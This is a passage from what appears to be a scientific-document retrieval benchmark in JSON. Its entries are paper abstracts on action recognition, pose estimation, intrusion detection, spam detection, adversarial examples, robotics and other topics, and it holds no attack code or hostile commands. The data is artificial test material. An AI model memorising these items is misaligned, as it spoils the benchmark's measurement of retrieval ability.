"text": "Representation of video is a vital problem in action recognition. This paper proposes Stacked Fisher Vectors (SFV), a new representation with multi-layer nested Fisher vector encoding, for action recognition. In the first layer, we densely sample large subvolumes from input videos, extract local features, and encode them using Fisher vectors (FVs). The second layer compresses the FVs of subvolumes obtained in previous layer, and then encodes them again with Fisher vectors. Compared with standard FV, SFV allows refining the representation and abstracting semantic information in a hierarchical way. Compared with recent mid-level based action representations, SFV need not to mine discriminative action parts but can preserve mid-level information through Fisher vector encoding in higher layer. We evaluate the proposed methods on three challenging datasets, namely Youtube, J-HMDB, and HMDB51. Experimental results demonstrate the effectiveness of SFV, and the combination of the traditional FV and SFV outperforms stateof-the-art methods on these datasets with a large margin.",
"title": ""
},
{
"docid": "7fa9bacbb6b08065ecfe0530f082a391",
"text": "This paper considers the task of articulated human pose estimation of multiple people in real world images. We propose an approach that jointly solves the tasks of detection and pose estimation: it infers the number of persons in a scene, identifies occluded body parts, and disambiguates body parts between people in close proximity of each other. This joint formulation is in contrast to previous strategies, that address the problem by first detecting people and subsequently estimating their body pose. We propose a partitioning and labeling formulation of a set of body-part hypotheses generated with CNN-based part detectors. Our formulation, an instance of an integer linear program, implicitly performs non-maximum suppression on the set of part candidates and groups them to form configurations of body parts respecting geometric and appearance constraints. Experiments on four different datasets demonstrate state-of-the-art results for both single person and multi person pose estimation.",
"title": ""
},
{
"docid": "eabb50988aeb711995ff35833a47770d",
"text": "Although chemistry is by far the largest scientific discipline according to any quantitative measure, it had, until recently, been virtually ignored by professional philosophers of science. They left both a vacuum and a one-sided picture of science tailored to physics. Since the early 1990s, the situation has changed drastically, such that philosophy of chemistry is now one of the most flourishing fields in the philosophy of science, like the philosophy of biology that emerged in the 1970s. This article narrates the development and provides a survey of the main topics and trends.",
"title": ""
},
{
"docid": "ceb6d99e16e2e93e57e65bf1ca89b44c",
"text": "The common use of smart devices encourages potential attackers to violate privacy. Sometimes taking control of one device allows the attacker to obtain secret data (such as password for home WiFi network) or tools to carry out DoS attack, and this, despite the limited resources of such devices. One of the solutions for gaining users’ confidence is to assign responsibility for detecting attacks to the service provider, particularly Internet Service Provider (ISP). It is possible, since ISP often provides also the Home Gateway (HG)—device that has multiple roles: residential router, entertainment center, and home’s “command and control” center which allows to manage the Smart Home entities. The ISP may extend this set of functionalities by implementing an intrusion detection software in HG provisioned to their customers. In this article we propose an Intrusion Detection System (IDS) distributed between devices residing at user’s and ISP’s premises. The Home Gateway IDS and the ISP’s IDS constitute together a distributed structure which allows spreading computations related to attacks against Smart Home ecosystem. On the other hand, it also leverages the operator’s knowledge of security incidents across the customer premises. This distributed structure is supported by the ISP’s expert system that helps to detect distributed attacks i.e., using botnets.",
"title": ""
},
{
"docid": "2cd54d9d7f65d6346db31d67a3529e20",
"text": "This paper proposes a modification in the maximum power point tracking (MPPT) by using model predictive control (MPC). The modification scheme of the MPPT control is based on the perturb and observe algorithm (P&O). This modified control is implemented on the dc-dc multilevel boost converter (MLBC) to increase the response of the controller to extract the maximum power from the photovoltaic (PV) module and to boost a small dc voltage of it. The total system consisting of a PV model, a MLBC and the modified MPPT has been analyzed and then simulated with changing the solar radiation and the temperature. The proposed control scheme is implemented under program MATLAB/SIMULINK and the obtained results are validated with real time simulation using dSPACE 1103 ControlDesk. The real time simulation results have been provided for principle validation.",
"title": ""
},
{
"docid": "7fd682de56cc80974b6d51fc86ff9dca",
"text": "We present an indoor localization application leveraging the sensing capabilities of current state of the art smart phones. To the best of our knowledge, our application is the first one to be implemented in smart phones and integrating both offline and online phases of fingerprinting, delivering an accuracy of up to 1.5 meters. In particular, we have studied the possibilities offered by WiFi radio, cellular communications radio, accelerometer and magnetometer, already embedded in smart phones, with the intention to build a multimodal solution for localization. We have also implemented a new approach for the statistical processing of radio signal strengths, showing that it can outperform existing deterministic techniques.",
"title": ""
},
{
"docid": "a1d97d822a8e1a72eec2a4524e8a522c",
"text": "Tags have been popularly utilized for better annotating, organizing and searching for desirable images. Image tagging is the problem of automatically assigning tags to images. One major challenge for image tagging is that the existing/training labels associated with image examples might be incomplete and noisy. Valuable prior work has focused on improving the accuracy of the assigned tags, but very limited work tackles the efficiency issue in image tagging, which is a critical problem in many large scale real world applications. This paper proposes a novel Binary Codes Embedding approach for Fast Image Tagging (BCE-FIT) with incomplete labels. In particular, we construct compact binary codes for both image examples and tags such that the observed tags are consistent with the constructed binary codes. We then formulate the problem of learning binary codes as a discrete optimization problem. An efficient iterative method is developed to solve the relaxation problem, followed by a novel binarization method based on orthogonal transformation to obtain the binary codes from the relaxed solution. Experimental results on two large scale datasets demonstrate that the proposed approach can achieve similar accuracy with state-of-the-art methods while using much less time, which is important for large scale applications.",
"title": ""
},
{
"docid": "371ba9bf45c6bc2bcfd74693386a97f9",
"text": "Based on the results of a series of roundtables and the surveys from a recent research project sponsored by the Center for Advanced Purchasing Studies, there appears to be several major themes that emerge from the research that provide some clear messages for supply chain management education and training requirements. This report is based on the general premise that as the supply chain management environment is changing, there is a changing skill set required for success. Some of the primary elements identified with respect to the new set of requirements for supply management include: q Great pressure for cost reduction due to globalization q A greater demand for performance from internal customers, q A greater need to integrate and exploit supply base technologies and capabilities, q An increased focus on outsourcing and strategic-value added relationships, q Increasing focus on the supply chain q Increasing need to capture total cost and establish the business case q Increasing need for technology integration and e-procurement deployment The top trends mentioned in the focus groups effectively triangulate with the results of the survey. As shown in Table 1, at least eight of the fourteen trends most often brought up as a key trend in the focus groups were also ranked in the top ten trends ranked by executives in the survey. This analysis ensures that the results triangulate",
"title": ""
},
{
"docid": "6868e3b2432d9914a9b4a4fd2b50b3ee",
"text": "Nutritional deficiencies detection for coffee leaves is a task which is often undertaken manually by experts on the field known as agronomists. The process they follow to carry this task is based on observation of the different characteristics of the coffee leaves while relying on their own experience. Visual fatigue and human error in this empiric approach cause leaves to be incorrectly labeled and thus affecting the quality of the data obtained. In this context, different crowdsourcing approaches can be applied to enhance the quality of the data extracted. These approaches separately propose the use of voting systems, association rule filters and evolutive learning. In this paper, we extend the use of association rule filters and evolutive approach by combining them in a methodology to enhance the quality of the data while guiding the users during the main stages of data extraction tasks. Moreover, our methodology proposes a reward component to engage users and keep them motivated during the crowdsourcing tasks. The extracted dataset by applying our proposed methodology in a case study on Peruvian coffee leaves resulted in 93.33% accuracy with 30 instances collected by 8 experts and evaluated by 2 agronomic engineers with background on coffee leaves. The accuracy of the dataset was higher than independently implementing the evolutive feedback strategy and an empiric approach which resulted in 86.67% and 70% accuracy respectively under the same conditions.",
"title": ""
},
{
"docid": "b13fa98311719f107b45e8d6840497f1",
"text": "Social Networks allow users to self-present by sharing personal contents with others which may add comments. Recent studies highlighted how the emotions expressed in a post affect others’ posts, eliciting a congruent emotion. So far, no studies have yet investigated the emotional coherence between wall posts and its comments. This research evaluated posts and comments mood of Facebook profiles, analyzing their linguistic features, and a measure to assess an excessive self-presentation was introduced. Two new experimental measures were built, describing the emotional loading (positive and negative) of posts and comments, and the mood correspondence between them was evaluated. The profiles ”empathy”, the mood coherence between post and comments, was used to investigate the relation between an excessive self-presentation and the emotional coherence of a profile. Participants publish a higher average number of posts with positive mood. To publish an emotional post corresponds to get more likes, comments and receive a coherent mood of comments, confirming the emotional contagion effect reported in literature. Finally, the more empathetic profiles are characterized by an excessive self-presentation, having more posts, and receiving more comments and likes. To publish emotional contents appears to be functional to receive more comments and likes, fulfilling needs of attention-seeking.",
"title": ""
},
{
"docid": "8be8390c90168c8fbd4d13119f1f643a",
"text": "We address the problem of determining the structure of a set of plot points for an interactive narrative. To do so, we define a formal two-player game where a computer can play with an author to learn the structural representation of the story. This technique will allow for authors unfamiliar, or uncomfortable, with mathematical structures to create the inputs interactive narrative algorithms require. We include the underlying mathematical theory as a foundation of our approach, and characterize it’s effectiveness through a series of simulation experiments. Results indicate there is promise in using formal games to aid in authoring interactive narrative structures.",
"title": ""
},
{
"docid": "28c03f6fb14ed3b7d023d0983cb1e12b",
"text": "The focus of this paper is speeding up the application of convolutional neural networks. While delivering impressive results across a range of computer vision and machine learning tasks, these networks are computationally demanding, limiting their deployability. Convolutional layers generally consume the bulk of the processing time, and so in this work we present two simple schemes for drastically speeding up these layers. This is achieved by exploiting cross-channel or filter redundancy to construct a low rank basis of filters that are rank-1 in the spatial domain. Our methods are architecture agnostic, and can be easily applied to existing CPU and GPU convolutional frameworks for tuneable speedup performance. We demonstrate this with a real world network designed for scene text character recognition [15], showing a possible 2.5⇥ speedup with no loss in accuracy, and 4.5⇥ speedup with less than 1% drop in accuracy, still achieving state-of-the-art on standard benchmarks.",
"title": ""
},
{
"docid": "ff93eba71b8a84c2d1f1263652582b42",
"text": "Quality is the assurance of adherence to the customer specifications and it is a measure of excellence or a state of being free from defects, deficiencies and significant variation from standards. Customer specification of the product can be met by strictly adhering to the quality control measures in the production process and can be ensured in a cost effective manner only if the quality of each and every process in the organization is well defined and ensured without any lapses. Every activity in the supply chain line to be critically verified to identify the quality deviations incurring additional expense or loss to the organization. This is in line with the continual improvement principle of TQM philosophy . The cost of quality management system acts as the most significant tool in measuring, monitoring, controlling and decision making activities in a firm which aims on business excellence.",
"title": ""
},
{
"docid": "ac5a8a336981878c3bc5a762fbdfadf2",
"text": "Cybercriminals have found in online social networks a propitious medium to spread spam and malicious content. Existing techniques for detecting spam include predicting the trustworthiness of accounts and analyzing the content of these messages. However, advanced attackers can still successfully evade these defenses.\n Online social networks bring people who have personal connections or share common interests to form communities. In this paper, we first show that users within a networked community share some topics of interest. Moreover, content shared on these social network tend to propagate according to the interests of people. Dissemination paths may emerge where some communities post similar messages, based on the interests of those communities. Spam and other malicious content, on the other hand, follow different spreading patterns.\n In this paper, we follow this insight and present POISED, a system that leverages the differences in propagation between benign and malicious messages on social networks to identify spam and other unwanted content. We test our system on a dataset of 1.3M tweets collected from 64K users, and we show that our approach is effective in detecting malicious messages, reaching 91% precision and 93% recall. We also show that POISED's detection is more comprehensive than previous systems, by comparing it to three state-of-the-art spam detection systems that have been proposed by the research community in the past. POISED significantly outperforms each of these systems. Moreover, through simulations, we show how POISED is effective in the early detection of spam messages and how it is resilient against two well-known adversarial machine learning attacks.",
"title": ""
},
{
"docid": "a9e1f453fd964bbb9354bfa9e304b09b",
"text": "Recurrent neural networks (RNNs) are capable of learning features and long term dependencies from sequential and time-series data. The RNNs have a stack of non-linear units where at least one connection between units forms a directed cycle. A well-trained RNN can model any dynamical system; however, training RNNs is mostly plagued by issues in learning long-term dependencies. In this paper, we present a survey on RNNs and several new advances for newcomers and professionals in the field. The fundamentals and recent advances are explained and the research challenges are introduced.",
"title": ""
},
{
"docid": "b4e6c50275eef350da454f088ba7e02c",
"text": "Children with language-based learning impairments (LLIs) have major deficits in their recognition of some rapidly successive phonetic elements and nonspeech sound stimuli. In the current study, LLI children were engaged in adaptive training exercises mounted as computer \"games\" designed to drive improvements in their \"temporal processing\" skills. With 8 to 16 hours of training during a 20-day period, LLI children improved markedly in their abilities to recognize brief and fast sequences of nonspeech and speech stimuli.",
"title": ""
},
{
"docid": "949e6376eb352482603e6168894744fb",
"text": "Search over encrypted data is a technique of great interest in the cloud computing era, because many believe that sensitive data has to be encrypted before outsourcing to the cloud servers in order to ensure user data privacy. Devising an efficient and secure search scheme over encrypted data involves techniques from multiple domains – information retrieval for index representation, algorithms for search efficiency, and proper design of cryptographic protocols to ensure the security and privacy of the overall system. This chapter provides a basic introduction to the problem definition, system model, and reviews the state-of-the-art mechanisms for implementing privacy-preserving keyword search over encrypted data. We also present one integrated solution, which hopefully offer more insights into this important problem.",
"title": ""
}
] | scidocsrr |
20445bd5b48bbe9779aefdbbb0f232ba | An online growth mindset intervention in a sample of rural adolescent girls. | [
{
"docid": "e3bb490de9489a0c02f023d25f0a94d7",
"text": "During the past two decades, self-efficacy has emerged as a highly effective predictor of students' motivation and learning. As a performance-based measure of perceived capability, self-efficacy differs conceptually and psychometrically from related motivational constructs, such as outcome expectations, self-concept, or locus of control. Researchers have succeeded in verifying its discriminant validity as well as convergent validity in predicting common motivational outcomes, such as students' activity choices, effort, persistence, and emotional reactions. Self-efficacy beliefs have been found to be sensitive to subtle changes in students' performance context, to interact with self-regulated learning processes, and to mediate students' academic achievement. Copyright 2000 Academic Press.",
"title": ""
}
] | [
{
"docid": "0640f60855954fa2f12a58f403aec058",
"text": "Corresponding Author: Vo Ngoc Phu Nguyen Tat Thanh University, 300A Nguyen Tat Thanh Street, Ward 13, District 4, Ho Chi Minh City, 702000, Vietnam Email: vongocphu03hca@gmail.com vongocphu@ntt.edu.vn Abstract: A Data Mining Has Already Had Many Algorithms Which A KNearest Neighbors Algorithm, K-NN, Is A Famous Algorithm For Researchers. K-NN Is Very Effective On Small Data Sets, However It Takes A Lot Of Time To Run On Big Datasets. Today, Data Sets Often Have Millions Of Data Records, Hence, It Is Difficult To Implement K-NN On Big Data. In This Research, We Propose An Improvement To K-NN To Process Big Datasets In A Shortened Execution Time. The Reformed KNearest Neighbors Algorithm (R-K-NN) Can Be Implemented On Large Datasets With Millions Or Even Billions Of Data Records. R-K-NN Is Tested On A Data Set With 500,000 Records. The Execution Time Of R-KNN Is Much Shorter Than That Of K-NN. In Addition, R-K-NN Is Implemented In A Parallel Network System With Hadoop Map (M) And Hadoop Reduce (R).",
"title": ""
},
{
"docid": "e61b6ae5d763fb135093cdfa035b82bf",
"text": "Computer-mediated communication is driving fundamental changes in the nature of written language. We investigate these changes by statistical analysis of a dataset comprising 107 million Twitter messages (authored by 2.7 million unique user accounts). Using a latent vector autoregressive model to aggregate across thousands of words, we identify high-level patterns in diffusion of linguistic change over the United States. Our model is robust to unpredictable changes in Twitter's sampling rate, and provides a probabilistic characterization of the relationship of macro-scale linguistic influence to a set of demographic and geographic predictors. The results of this analysis offer support for prior arguments that focus on geographical proximity and population size. However, demographic similarity - especially with regard to race - plays an even more central role, as cities with similar racial demographics are far more likely to share linguistic influence. Rather than moving towards a single unified \"netspeak\" dialect, language evolution in computer-mediated communication reproduces existing fault lines in spoken American English.",
"title": ""
},
{
"docid": "fca8b36d81d92138c3fdebffeaa04177",
"text": "Semantic Image Interpretation (SII) is the task of extracting structured semantic descriptions from images. It is widely agreed that the combined use of visual data and background knowledge is of great importance for SII. Recently, Statistical Relational Learning (SRL) approaches have been developed for reasoning under uncertainty and learning in the presence of data and rich knowledge. Logic Tensor Networks (LTNs) are an SRL framework which integrates neural networks with first-order fuzzy logic to allow (i) efficient learning from noisy data in the presence of logical constraints, and (ii) reasoning with logical formulas describing general properties of the data. In this paper, we develop and apply LTNs to two of the main tasks of SII, namely, the classification of an image’s bounding boxes and the detection of the relevant part-of relations between objects. To the best of our knowledge, this is the first successful application of SRL to such SII tasks. The proposed approach is evaluated on a standard image processing benchmark. Experiments show that the use of background knowledge in the form of logical constraints can improve the performance of purely data-driven approaches, including the state-of-the-art Fast Region-based Convolutional Neural Networks (Fast R-CNN). Moreover, we show that the use of logical background knowledge adds robustness to the learning system when errors are present in the labels of the",
"title": ""
},
{
"docid": "b0cc7d5313acaa47eb9cba9e830fa9af",
"text": "Data-driven intelligent transportation systems utilize data resources generated within intelligent systems to improve the performance of transportation systems and provide convenient and reliable services. Traffic data refer to datasets generated and collected on moving vehicles and objects. Data visualization is an efficient means to represent distributions and structures of datasets and reveal hidden patterns in the data. This paper introduces the basic concept and pipeline of traffic data visualization, provides an overview of related data processing techniques, and summarizes existing methods for depicting the temporal, spatial, numerical, and categorical properties of traffic data.",
"title": ""
},
{
"docid": "3f807cb7e753ebd70558a0ce74b416b7",
"text": "In this paper, we study the problem of recovering a tensor with missing data. We propose a new model combining the total variation regularization and low-rank matrix factorization. A block coordinate decent (BCD) algorithm is developed to efficiently solve the proposed optimization model. We theoretically show that under some mild conditions, the algorithm converges to the coordinatewise minimizers. Experimental results are reported to demonstrate the effectiveness of the proposed model and the efficiency of the numerical scheme. © 2015 Elsevier Inc. All rights reserved.",
"title": ""
},
{
"docid": "f5fb99d9dccdd2a16dc4c3f160e65389",
"text": "We present the Flink system for the extraction, aggregation and visualization of online social networks. Flink employs semantic technology for reasoning with personal information extracted from a number of electronic information sources including web pages, emails, publication archives and FOAF profiles. The acquired knowledge is used for the purposes of social network analysis and for generating a webbased presentation of the community. We demonstrate our novel method to social science based on electronic data using the example of the Semantic Web research community.",
"title": ""
},
{
"docid": "1aceb187e79fae4d859d55ae1a2cc77e",
"text": "T HE recent development of various methods of modulation such as PCM and PPM which exchange bandwidth for signal-to-noise ratio has intensified the interest in a general theory of communication. A basis for such a theory is contained in the important papers of Nyquist 1 and Hartley2 on this subject. In the present paper we will extend the theory to include a number of new factors, in particular the effect of noise in the channel, and the savings possible due to the statistical structure of the original message and due to the nature of the final destination of the information. The fundamental problem of communication is that of reproducing at one point either exactly or approximately a message selected at another point. Frequently the messages have meaning; that is they refer to or are correlated according to some system with certain physical or conceptual entities. These semantic aspects of communication are irrelevant to the engineering problem. The significant aspect is that the actual message is one selected from a set of possible messages. The system must be designed to operate for each possible selection, not just the one which will actually be chosen since this is unknown at the time of design. If the number of messages in the set is finite then this number or any monotonic function of this number can be regarded as a measure of the information produced when one message is chosen from the set, all choices being equally likely. As was pointed out by Hartley the most natural choice is the logarithmic function. Although this definition must be generalized considerably when we consider the influence of the statistics of the message and when we have a continuous range of messages, we will in all cases use an essentially logarithmic measure. The logarithmic measure is more convenient for various reasons:",
"title": ""
},
{
"docid": "bbb0d0ae53039c5e94614fad60ab5cf7",
"text": "UNLABELLED\nSclerosing rhabdomyosarcoma (SRMS) is exceedingly rare, and may cause a great diagnostic confusion. Histologically, it is characterized by abundant extracellular hyalinized matrix mimicking primitive chondroid or osteoid tissue. So, it may be easily misdiagnosed as chondrosarcoma, osteosarcoma, angiosarcoma and so on. Herein, we report a case of SRMS occurring in the masseter muscle in a 40-year-old male. The tumor showed a diverse histological pattern. The tumor cells were arranged into nests, cords, pseudovascular, adenoid, microalveoli and even single-file arrays. Immunostaining showed that the tumor was positive for the Vimentin, Desmin and MyoD1, and was negative for CK, P63, NSE, CD45, CD30, S-100, CD99, Myoglobin, CD68, CD34, CD31, and α-SMA. Based on the morphological finding and immunostaining, it was diagnosed as a SRMS. In addition, focally, our case also displayed a cribriform pattern resembling adenoid cystic carcinoma. This may represent a new histological feature which can broaden the histological spectrum of this tumor and also may lead to diagnostic confusion.\n\n\nVIRTUAL SLIDES\nThe virtual slide(s) for this article can be found here: http://www.diagnosticpathology.diagnomx.eu/vs/1615846455818924.",
"title": ""
},
{
"docid": "a62cbb8f7b3a634ba1efe9dbe679fac6",
"text": "Cloud Computing offers virtualized computing, storage, and networking resources, over the Internet, to organizations and individual users in a completely dynamic way. These cloud resources are cheaper, easier to manage, and more elastic than sets of local, physical, ones. This encourages customers to outsource their applications and services to the cloud. The migration of both data and applications outside the administrative domain of customers into a shared environment imposes transversal, functional problems across distinct platforms and technologies. This article provides a contemporary discussion of the most relevant functional problems associated with the current evolution of Cloud Computing, mainly from the network perspective. The paper also gives a concise description of Cloud Computing concepts and technologies. It starts with a brief history about cloud computing, tracing its roots. Then, architectural models of cloud services are described, and the most relevant products for Cloud Computing are briefly discussed along with a comprehensive literature review. The paper highlights and analyzes the most pertinent and practical network issues of relevance to the provision of high-assurance cloud services through the Internet, including security. Finally, trends and future research directions are also presented.",
"title": ""
},
{
"docid": "74b0da517fab1f6e7e56f9e027549c08",
"text": "The ambition of this paper is to design a position controller of a DC motor by selection of a PID parameter using genetic algorithm. The Proportional plus Integral plus Derivative (PID), controllers are most widely used in control theory as well as industrial plants due to their ease of execution and robustness performance. The aspiration of this deed representation capable and apace tuning approach using Genetic Algorithm (GA) to obtain the optimized criterion of the PID controller so as to appropriate the essential appearance designation of the technique below consideration. This scheme is a simulation and experimental analysis into the development of PID controller using MATLAB/SIMULINK software. There are several techniques which are used for tuning of PID controller to control the speed control of DC motor. Tuning of PID parameters is considerable because these parameters have a admirable effect on the stability and performance of the control system. Using genetic algorithms to perform the tuning of the controller results in the optimum controller being appraise for the system every time.",
"title": ""
},
{
"docid": "681394e4cdb92de142f1bb9447d02110",
"text": "Generating adversarial examples is a critical step for evaluating and improving the robustness of learning machines. So far, most existing methods only work for classification and are not designed to alter the true performance measure of the problem at hand. We introduce a novel flexible approach named Houdini for generating adversarial examples specifically tailored for the final performance measure of the task considered, be it combinatorial and non-decomposable. We successfully apply Houdini to a range of applications such as speech recognition, pose estimation and semantic segmentation. In all cases, the attacks based on Houdini achieve higher success rate than those based on the traditional surrogates used to train the models while using a less perceptible adversarial perturbation.",
"title": ""
},
{
"docid": "8caf898272d692e36f76a6feb5ed36f3",
"text": "This paper reviews theory and research regarding the ‘‘Michelangelo phenomenon.’’ The Michelangelo model suggests that close partners sculpt one another’s selves, shaping one another’s skills and traits and promoting versus inhibiting one another’s goal pursuits. As a result of the manner in which partners perceive and behave toward one another, each person enjoys greater or lesser success at attaining his or her ideal-self goals. Affirmation of one another’s ideal-self goals yields diverse benefits, both personal and relational. The Michelangelo model and supportive empirical evidence are reviewed, the phenomenon is distinguished from related interpersonal processes, and directions for future work are outlined. KEYWORDS—Michelangelo phenomenon; interdependence; ideal self; relationships People have dreams and aspirations, or mental representations of the skills, traits, and resources that they ideally would like to acquire. These aspirations include diverse goals: People may want to acquire desirable traits such as warmth, confidence, or decisiveness; to achieve professional success in the form of advancement, peer respect, or financial benefits; or to advance important pursuits involving religion, travel, or athletics. Most explanations of how people acquire new skills, traits, and resources are intrapersonal, examining the individual in isolation (cf. Carver & Scheier, 1998). But granting that people sometimes achieve desirable goals through their own actions, this personcentric approach ignores the important role that close partners play in helping people achieve their dreams and aspirations. In the following pages we review theory and research regarding the ‘‘Michelangelo phenomenon,’’ one of the most prominent interpersonal models of how close partners promote versus inhibit each person’s pursuit of ideal self goals (Drigotas, Rusbult, Wieselquist, & Whitton, 1999). THE IDEAL SELF AND PARTNER AFFIRMATION Michelangelo Buonarroti described sculpting as a process whereby the artist releases an ideal figure from the block of stone in which it slumbers. The sculptor’s task is simply to chip away at the stone so as to reveal the ideal form (Gombrich, 1995). Figure 1 depicts one of Michelangelo’s unfinished captives, vividly illustrating this process. One can readily feel the force with which the ideal form strives to emerge from the stone, shedding its imperfections. The sculptor chisels, carves, and polishes the stone to reveal the ideal form slumbering within. Humans, too, possess ideal forms. The ideal self describes an individual’s dreams and aspirations, or the constellation of skills, traits, and resources that an individual ideally wishes to acquire (Higgins, 1987; Markus & Nurius, 1986). For example, Mary’s ideal self might include goals such as completing medical school, becoming more sociable, or learning to speak fluent Dutch. Whether images of the ideal self constitute vague yearnings or clearly articulated mental representations, dreams and aspirations serve a crucial function, providing direction to personal growth strivings and thereby helping people reduce the discrepancy between the actual self and the ideal self (Higgins, 1987). Although people sometimes achieve ideal-relevant goals solely through their own actions, the acquisition of new skills, traits, and resources is also shaped by interpersonal experience. People adapt to one another during the course of interaction, changing their behavior so as to coordinate with one another and respond to each person’s needs and expectations (Kelley et al., 2003). For example, John may help Mary become more sociable by subtly directing conversation during a dinner party, leading Mary to tell one of her most charming stories. Adaptation may transpire in interactions with diverse types of partner, including romantic partners, kin, friends, or colleagues. However, adaptation is most probable, powerful, and enduring in highly interdependent relationships, in that the mutual dependence of close partners provides good opportunities for exerting strong, frequent, and benevolent influence across diverse behavioral domains (Kelley et al., 1983). Over time, adaptations that begin as temporary, interaction-specific adjustments become stable components of the self, such that over the course of extended interaction, close partners sculpt one another’s selves: People come to reflect what their partners ‘‘see in them’’ and ‘‘elicit from them’’ (Rusbult & Van Lange, 2003). Address correspondence to Caryl E. Rusbult, Department of Social Psychology, Vrije Universiteit Amsterdam, Van der Boechorststraat 1, 1081 BT Amsterdam, The Netherlands; e-mail: ce.rusbult@ psy.vu.nl. CURRENT DIRECTIONS IN PSYCHOLOGICAL SCIENCE Volume 18—Number 6 305 Copyright r 2009 Association for Psychological Science Is such adaptation a good thing or a bad thing? The concept of partner affirmation describes whether the partner is an ally, neutral party, or foe in individual goal pursuits (Drigotas et al., 1999). As noted in Figure 2, affirmation has two components: Partner perceptual affirmation describes the extent to which a partner consciously or unconsciously perceives the target in ways that are compatible with the target’s ideal self. For example, John may deliberately consider the character of Mary’s ideal self, consciously developing benevolent interpretations of disparities between her actual self and ideal self. Alternatively, if John and Mary possess similar life goals or values, John may rather automatically perceive and display faith in Mary’s ideal goal pursuits. Partner behavioral affirmation describes the extent to which a partner consciously or unconsciously behaves in ways that elicit ideal-congruent behaviors from the target. For example, John may rather automatically communicate confidence in Mary’s abilities, he may consciously or unconsciously react in a positive manner when she enacts ideal congruent behaviors, or he may provide direct assistance in her goal pursuits. Of course, John may also disaffirm Mary by communicating indifference, pessimism, or disapproval, by undermining her ideal pursuits, or by affirming qualities that are antithetical to Mary’s ideal self. The model proposes that partner affirmation yields target movement toward the ideal self (see Fig. 2): Because John affirms Mary’s ideals, Mary increasingly comes to resemble her ideal self. Prior research has revealed good support for this claim. For example, in one study we videotaped married partners while they discussed a goal relevant to each person’s ideal self. Trained coders rated the extent to which the partner exhibited affirming behaviors (e.g., helped target clarify plans, offered assistance, or praised goal pursuits). Four months later, we asked targets whether they had achieved the goals they discussed in the conversations. Analyses revealed that when partners were more affirming during goal-relevant conversations, targets were more likely to achieve their ideal-self goals (Rusbult, Coolsen, et al., 2009). In another study we asked pairs of friends to provide complementary questionnaire data wherein (a) one friend served as ‘‘target,’’ rating his or her own experiences of partner affirmation and target movement (how affirming is your dating partner?; how successful are you at your goal pursuits?), and (b) the second friend served as ‘‘observer,’’ also rating partner affirmation and target movement (how affirming is the target’s dating partner?; how successful is the target at his or her goal pursuits?). Analyses revealed sizable across-friend associations—for example, when friends (as observers) described the target’s partner as highly affirming, individuals themselves (as targets) reported greater movement toward their ideal selves (Drigotas et al., 1999). Of what consequence is the Michelangelo phenomenon? Growth striving is a primary human motive (cf. Deci & Ryan, 2000)—a motive that is directly gratified by movement toward the ideal self. Accordingly, when a partner is affirming and a target moves closer to his or her ideals, the target enjoys enhanced personal well-being, including greater life satisfaction and psychological health (e.g., Drigotas, 2002). Moreover, when a partner serves as an ally in promoting target growth, the target enjoys enhanced couple well-being, including greater adjustment and probability of persistence (e.g., Drigotas et al., 1999; Kumashiro, Rusbult, Finkenauer, & Stocker, 2007). PARTNER AFFIRMATION AND RELATED INTERPERSONAL PROCESSES Partner Enhancement In what ways does partner affirmation differ from related interpersonal processes? To begin with, how does partner affirmation relate to partner enhancement, which describes the extent to which a partner perceives the target and behaves toward the target in ways that are more positive than may be ‘‘realistically’’ warranted—for example, in a manner that is more positive than the target perceives the self. Numerous studies have revealed that partner enhancement is beneficial to individuals and to relationships: For example, when partners perceive one another more positively than each person perceives himself or herself, relationships exhibit superior functioning (e.g., Murray, Holmes, & Griffin, 1996). Fig. 1. Unfinished ‘‘captive’’ by Michelangelo Buonarroti. 306 Volume 18—Number 6 The Michelangelo Phenomenon",
"title": ""
},
{
"docid": "5a6b5e5a977f2a8732c260fb99a67cad",
"text": "The configuration design for a wall-climbing robot which is capable of moving on diversified surfaces of wall and has high payload capability, is discussed, and a developed quadruped wall-climbing robot, NINJA-1, is introduced. NINJA-1 is composed of (1) legs based on a 3D parallel link mechanism capable of producing a powerful driving force for moving on the surface of a wall, (2) a conduit-wire-driven parallelogram mechanism to adjust the posture of the ankles, and (3) a valve-regulated multiple sucker which can provide suction even if there are grooves and small differences in level of the wall. Finally, the data of the trial-manufactured NINJA-1, and the up-to-date status of the walking motion are shown.<<ETX>>",
"title": ""
},
{
"docid": "262c11ab9f78e5b3f43a31ad22cf23c5",
"text": "Responding to threats in the environment is crucial for survival. Certain types of threat produce defensive responses without necessitating previous experience and are considered innate, whereas other threats are learned by experiencing aversive consequences. Two important innate threats are whether an encountered stimulus is a member of the same species (social threat) and whether a stimulus suddenly appears proximal to the body (proximal threat). These threats are manifested early in human development and robustly elicit defensive responses. Learned threat, on the other hand, enables adaptation to threats in the environment throughout the life span. A well-studied form of learned threat is fear conditioning, during which a neutral stimulus acquires the ability to eliciting defensive responses through pairings with an aversive stimulus. If innate threats can facilitate fear conditioning, and whether different types of innate threats can enhance each other, is largely unknown. We developed an immersive virtual reality paradigm to test how innate social and proximal threats are related to each other and how they influence conditioned fear. Skin conductance responses were used to index the autonomic component of the defensive response. We found that social threat modulates proximal threat, but that neither proximal nor social threat modulates conditioned fear. Our results suggest that distinct processes regulate autonomic activity in response to proximal and social threat on the one hand, and conditioned fear on the other.",
"title": ""
},
{
"docid": "8b02f168b2021287848b413ffb297636",
"text": "BACKGROUND\nIdentification of patient at risk of subglottic infantile hemangioma (IH) is challenging because subglottic IH can grow fast and cause airway obstruction with a fatal course.\n\n\nOBJECTIVE\nTo refine the cutaneous IH pattern at risk of subglottic IH.\n\n\nMETHODS\nProspective and retrospective review of patients with cutaneous IH involving the beard area. IHs were classified in the bilateral pattern group (BH) or in the unilateral pattern group (UH). Infantile hemangioma topography, subtype (telangiectatic or tuberous), ear, nose and throat (ENT) manifestations and subglottic involvement were recorded.\n\n\nRESULTS\nThirty-one patients (21 BH and 10 UH) were included during a 20-year span. Nineteen patients (16 BH and 3 UH) had subglottic hemangioma. BH and UH group overlap on the median pattern (tongue, gum, lips, chin and neck). Median pattern, particularly the neck area and telangiectatic subtype of IH were significantly associated with subglottic involvement.\n\n\nCONCLUSION\nPatients presenting with telangiectatic beard IH localized on the median area need early ENT exploration. They should be treated before respiratory symptoms occur.",
"title": ""
},
{
"docid": "430c4f8912557f4286d152608ce5eab8",
